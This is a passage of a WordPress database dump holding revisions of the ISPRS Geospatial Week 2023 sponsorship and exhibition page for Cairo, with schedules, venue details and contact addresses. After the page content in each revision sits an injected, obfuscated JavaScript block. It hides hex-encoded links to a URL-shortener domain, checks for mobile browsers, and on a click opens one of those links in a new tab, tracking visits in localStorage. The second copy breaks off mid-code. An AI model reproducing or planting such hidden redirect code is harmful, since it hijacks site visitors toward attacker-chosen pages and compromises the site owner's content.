Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 15:45:47','2022-10-26 15:45:47','',2920,'https://gsw2023.com/?p=2940',0,'revision','',0),
(2941,1,'2022-10-26 16:00:45','2022-10-26 16:00:45','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<p><strong>Abouquir,Alexandria Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. (+203) 22685616</strong></p>\n<p><b>Fax:(+203) </b></p>\n<p>&nbsp;[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 